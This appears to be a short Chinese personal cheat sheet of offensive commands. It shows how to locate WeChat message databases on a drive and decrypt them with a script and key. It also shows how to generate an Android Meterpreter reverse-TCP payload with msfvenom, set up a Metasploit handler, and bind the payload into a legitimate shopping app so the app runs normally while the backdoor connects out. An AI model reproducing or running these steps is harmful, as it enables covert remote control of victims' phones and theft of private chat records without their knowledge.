随手记
**查找微信数据库**
dir /a /s /b d:\\*.db | findstr "MSG0.DB"
解密聊天记录
使用解密脚本:python Decode.py -k 4988C45601A6***************8115FF6D840A -d MSG0.db
三、将安卓远控Apk附加进普通的App中,运行新生成的App时,普通App正常运行,远控正常上线
msfmsfvenom
msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk
msfconsole
# 启动 msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3306
set exitonsession false
exploit -j
520ApkHook
java -jar a520ApkHook-1.0-jar-with-dependencies.jar ~/Downloads/京东.apk ~/Downloads/msf.apk